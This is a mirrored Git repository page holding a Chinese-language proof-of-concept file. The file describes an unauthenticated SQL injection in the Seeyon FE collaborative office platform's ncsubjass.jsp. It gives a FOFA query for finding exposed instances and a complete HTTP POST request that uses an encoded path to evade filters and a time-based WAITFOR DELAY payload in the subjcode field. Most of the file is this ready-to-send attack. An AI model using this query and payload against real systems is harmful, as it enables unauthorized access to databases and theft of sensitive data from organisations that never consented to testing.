admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-05 02:15:30 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/致远OA/致远互联FE协作办公平台ncsubjass存在SQL注入.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

22 lines
535 B
Markdown
Raw Blame History

## 致远互联FE协作办公平台ncsubjass存在SQL注入
致远互联FE协作办公平台ncsubjass.jsp存在SQL注入漏洞,未经身份验证的攻击者可以通过此漏洞获取数据库敏感信息。
## fofa
```
body="li_plugins_download"
```
## poc
```
POST /fenc/ncsubjass.j%73p HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
subjcode=';WAITFOR DELAY '0:0:5'--
```
Reference in New Issue View Git Blame Copy Permalink